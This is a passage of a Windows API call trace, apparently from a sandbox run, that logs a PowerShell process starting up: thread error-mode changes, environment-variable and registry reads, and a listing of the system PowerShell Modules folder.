lpOldMode=0xb156f8dfc0) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.911] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.933] CoTaskMemAlloc (cb=0x20e) returned 0x1e3510c91c0 [0139.933] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e3510c91c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0139.933] CoTaskMemFree (pv=0x1e3510c91c0) [0139.933] CoTaskMemAlloc (cb=0x20e) returned 0x1e3510c91c0 [0139.933] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1e3510c91c0, nSize=0x105 | out: lpBuffer="") returned 0x3a [0139.934] CoTaskMemFree (pv=0x1e3510c91c0) [0139.934] CoTaskMemAlloc (cb=0x20e) returned 0x1e3510c91c0 [0139.934] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1e3510c91c0, nSize=0x105 | out: lpBuffer="") returned 0x3a [0139.934] CoTaskMemFree (pv=0x1e3510c91c0) [0139.934] CoTaskMemAlloc (cb=0x20e) returned 0x1e3510c91c0 [0139.934] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1e3510c91c0, nSize=0x105 | out: lpBuffer="") returned 0x9c [0139.934] CoTaskMemFree (pv=0x1e3510c91c0) [0139.934] CoTaskMemAlloc (cb=0x20e) returned 0x1e3510c91c0 [0139.934] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1e3510c91c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.934] CoTaskMemFree (pv=0x1e3510c91c0) [0139.944] CoTaskMemAlloc (cb=0x20e) returned 0x1e3510c91c0 [0139.944] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1e3510c91c0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0139.944] CoTaskMemFree (pv=0x1e3510c91c0) [0139.944] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8df08 | out: phkResult=0xb156f8df08*=0x6fc) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8df58, lpData=0x0, lpcbData=0xb156f8df50*=0x0 | out: lpType=0xb156f8df58*=0x1, lpData=0x0, lpcbData=0xb156f8df50*=0x56) returned 0x0 [0139.945] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8df58, lpData=0x1e3392cce90, lpcbData=0xb156f8df50*=0x56 | out: lpType=0xb156f8df58*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8df50*=0x56) returned 0x0 [0139.945] RegCloseKey (hKey=0x6fc) returned 0x0 [0139.954] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8dad0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0139.966] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8dad0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0139.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8df20) returned 1 [0139.966] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e000 | out: lpFileInformation=0xb156f8e000*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0139.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dee0) returned 1 [0139.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8dad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0139.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8df20) returned 1 [0139.967] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e000 | out: lpFileInformation=0xb156f8e000*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0139.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dee0) returned 1 [0140.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dec0) returned 1 [0140.053] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8d9a0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0140.053] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0xb156f8dbd0 | out: lpFindFileData=0xb156f8dbd0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a29c0 [0140.056] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.057] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0140.062] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0140.062] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0140.062] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0140.063] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0140.063] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0140.063] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0140.063] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0140.063] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0140.063] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0140.064] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0140.064] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0140.064] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0140.064] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0140.064] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0140.064] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0140.065] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0140.065] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0140.065] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0140.065] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0140.065] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0140.066] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0140.066] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0140.066] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: lpFindFileData=0xb156f8db90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0140.066] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8db90 | out: 